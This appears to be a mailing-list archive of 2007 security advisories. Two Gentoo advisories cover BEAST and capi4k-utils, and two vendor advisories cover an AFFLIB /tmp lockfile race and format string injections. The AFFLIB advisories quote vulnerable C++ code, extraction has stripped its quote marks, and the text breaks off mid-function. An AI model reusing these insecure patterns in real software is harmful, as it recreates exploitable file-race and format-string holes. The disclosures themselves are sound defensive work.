- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: BEAST: Denial of Service Date: April 27, 2007 Bugs: #163146 ID: 200704-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in BEAST allowing for a Denial of Service. Background == BEdevilled Audio SysTem is an audio compositor, supporting a wide range of audio formats. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 media-sound/beast0.7.1 = 0.7.1 Description === BEAST, which is installed as setuid root, fails to properly check whether it can drop privileges accordingly if seteuid() fails due to a user exceeding assigned resource limits. Impact == A local user could exceed his resource limit in order to prevent the seteuid() call from succeeding. This may lead BEAST to keep running with root privileges. Then, the local user could use the save as dialog box to overwrite any file on the vulnerable system, potentially leading to a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All BEAST users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-sound/beast-0.7.1 References == [ 1 ] CVE-2006-2916 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916 [ 2 ] CVE-2006-4447 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpNkHRJDYbOe.pgp Description: PGP signature
[ GLSA 200704-23 ] capi4k-utils: Buffer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: capi4k-utils: Buffer overflow Date: April 27, 2007 Bugs: #170870 ID: 200704-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis capi4k-utils is vulnerable to a buffer overflow in the bufprint() function. Background == capi4k-utils is a set of utilities for accessing COMMON-ISDN-API software interfaces for ISDN devices. Affected packages = --- Package /Vulnerable/ Unaffected --- 1 net-dialup/capi4k-utils 20050718-r3 = 20050718-r3 Description === The bufprint() function in capi4k-utils fails to properly check boundaries of data coming from CAPI packets. Impact == A local attacker could possibly escalate privileges or cause a Denial of Service by sending a crafted CAPI packet. Workaround == There is no known workaround at this time. Resolution == All capi4k-utils users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-dialup/capi4k-utils-20050718-r3 References == [ 1 ] CVE-2007-1217 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-1217 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-23.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpVrXGoHkODR.pgp Description: PGP signature
AFFLIB(TM): Time-of-Check-Time-of-Use File Race
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Time-of-Check-Time-of-Use File Race in AFFLIB Release Date: 2007-04-27 Application: AFFLIB(TM) Versions: 2.2.0-2.2.8 and likely earlier versions. Severity: Low Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com Vendor Status: Vendor Notified CVE Candidate: CVE-2007-2056 Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-toctou.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From the forensicswiki.org website[1]: The Advanced Forensics Format (AFF) is an extensible open format for the storage of disk images and related forensic metadata. It was developed by Simson Garfinkel and Basis Technology. AFFLIB(TM) is the reference implementation of the AFF(TM) format, written primarily by Simson Garfinkel. It comes in the form of an open source library and a set of command line tools used to manipulate AFF(TM) files. Vulnerability Overview: In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a security code review of AFFLIB(TM) as a part of an internal tool assessment process. As a result, multiple vulnerabilities of varying severities were discovered. The most significant of these vulnerabilities are being announced publicly to raise awareness and help end-users secure themselves against potential attack. A time-of-check-time-of-use race was discovered in AFFLIB(TM) which could allow an attacker on the local machine to overwrite an arbitrary file. Because the content of the file would not be controllable by an attacker, it is unlikely that this is vulnerability is exploitable for more than a denial-of-service. This vulnerability remains in the latest version (2.2.8) despite several notifications to the vendor. All line numbers listed below are from version 2.2.0. Vulnerability Details: File: aimage/aimage.cpp Lines: 554-575 Platforms Affected: Unix Description: A mostly predictable name for the lockfile as it is created under /tmp. An access check is first performed, and later the file is opened, truncating if it already exists. Since the time of check and time of use are not the same, a filesystem race could be exploited by a local attacker through the use of a symlink. Lines 548-582 are included below to illustrate the problem: int getlock(class imager *im) { /* If the file exists and the PID in the file is running, * can't get the lock. */ char lockfile[MAXPATHLEN]; sprintf(lockfile,/tmp/aimge.%s.lock,im-infile); if(access(lockfile,F_OK)==0){ /* Lockfile exists. Get it's pid */ char buf[1024]; FILE *f = fopen(lockfile,r); if(!f){ perror(lockfile); // can't read lockfile... return -1; } fgets(buf,sizeof(buf),f); buf[sizeof(buf)-1] = 0; int pid = atoi(buf); if(checkpid(pid)==0){ /* PID is not running; we can delete the lockfile */ if(unlink(lockfile)){ err(1,could not delete lockfile %s: ,lockfile); } } /* PID is running; generate error */ errx(1,%s is locked by process %d\n,im-infile,pid); } FILE *f = fopen(lockfile,w); if(!f){ err(1,lockfile); } fprintf(f,%d\n,getpid()); // save our PID. fclose(f); return 0; } This is likely only exploitable for a denial-of-service condition, since the attacker would have little control over the content being written (the process ID of aimage). Vendor Response: Simson Garfinkel was first contacted on 2007-03-31. The following timeline outlines the responses from the vendor regarding this issue: 2007-04-01 - Vendor provided details of all vulnerabilities identified. 2007-04-03 - Continued vendor communication. 2007-04-05 - Vendor released version 2.2.6, containing multiple security fixes. 2007-04-06 - Vendor notified VSR that fixes were released. 2007-04-09 - VSR notified vendor that 9 vulnerability instances still remained in latest release. 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed in next release. 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify VSR. 2007-04-27 - VSR discovered new versions were released. VSR inspected version 2.2.8 and found that no additional vulnerabilities were fixed. VSR advisories published. Recommendation: AFFLIB(TM) users should upgrade to the newest version. Third-party
AFFLIB(TM): Multiple Format String Injections
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Multiple Format String Injections in AFFLIB Release Date: 2007-04-27 Application: AFFLIB(TM) Versions: 2.2.0-2.2.5 and likely earlier. 2.2.6-2.2.8 contain a subset of these vulnerabilities. Severity: Medium to Low Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com Vendor Status: Vendor Notified, Limited Fixes Available CVE Candidate: CVE-2007-2054 Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-fmtstr.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From the forensicswiki.org website[1]: The Advanced Forensics Format (AFF) is an extensible open format for the storage of disk images and related forensic metadata. It was developed by Simson Garfinkel and Basis Technology. AFFLIB(TM) is the reference implementation of the AFF(TM) format, written primarily by Simson Garfinkel. It comes in the form of an open source library and a set of command line tools used to manipulate AFF(TM) files. Vulnerability Overview: In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a security code review of AFFLIB(TM) as a part of an internal tool assessment process. As a result, multiple vulnerabilities of varying severities were discovered. The most significant of these vulnerabilities are being announced publicly to raise awareness and help end-users secure themselves against potential attack. Several command line utilities included in AFFLIB(TM) pass command line arguments to warn() and err() calls as part of the format string argument. If an attacker could influence these command line parameters, these could be exploited to execute arbitrary code. Some of the listed vulnerabilities have been fixed in versions 2.2.6 and later, but others remain in the latest release (2.2.8). All line numbers listed below are from version 2.2.0. Vulnerability Details: The following sections include detailed descriptions of the format string injection vulnerabilities found during the assessment. * Format String Injection in s3 * File: lib/s3.cpp Line: 207 Description: A command line parameter is used as the format string in the err() call. If an attacker could control this name, a format string injection vulnerability could be exploited. Lines 192-207 are included to illustrate the problem: void s3_cp(const char *fname,string key) { struct s3headers meta[2] = {{0,0},{0,0}}; char buf[64]; if(opt_flag){ snprintf(buf,sizeof(buf),%d,opt_flag); meta[0].name = AMAZON_METADATA_PREFIX arg; meta[0].value = buf; } /* Read from fname into a buffer. * Note that we do this with read, so that we can read from stdin */ FILE *f = fopen(fname,r); if(!f) err(1,fname); An attacker could exploit this problem if the s3 binary were setuid/setgid, or if the s3 program were executed in a CGI script or something similar. * Format String Injections in afconvert * File: tools/afconvert.cpp Lines: 226, 263, and 305 Description: A command line parameter is used as the format string in three err() calls. If an attacker could control this name, a format string injection vulnerability could be exploited. * Format String Injection in afcopy * File: tools/afcopy.cpp Lines: 202 and 250 Description: A command line parameter is used as the format string in two err() calls. If an attacker could control this name, a format string injection vulnerability could be exploited. * Format String Injection in afinfo * File: tools/afinfo.cpp Line: 584 Description: A command line parameter is used as the format string in the err() call. If an attacker could control this name, a format string injection vulnerability could be exploited. * Format String Injection in aimage * File: aimage/aimage.cpp Line: 577 Description: A command line parameter is used as the format string in the err() call. If an attacker could control this name, a format string injection vulnerability could be exploited. Lines 548-577 are included below to help illustrate the problem: int getlock(class imager *im) { /* If the file exists and the PID in the file is running, * can't get the lock. */ char lockfile[MAXPATHLEN]; sprintf(lockfile,/tmp/aimge.%s.lock,im-infile); if(access(lockfile,F_OK)==0){ /* Lockfile exists. Get it's pid */ char buf[1024]; FILE *f = fopen(lockfile,r); if(!f){ perror(lockfile); // can't read lockfile... return -1; } fgets(buf,sizeof(buf),f); buf[sizeof(buf)-1] = 0; int pid = atoi(buf); if(checkpid(pid)==0){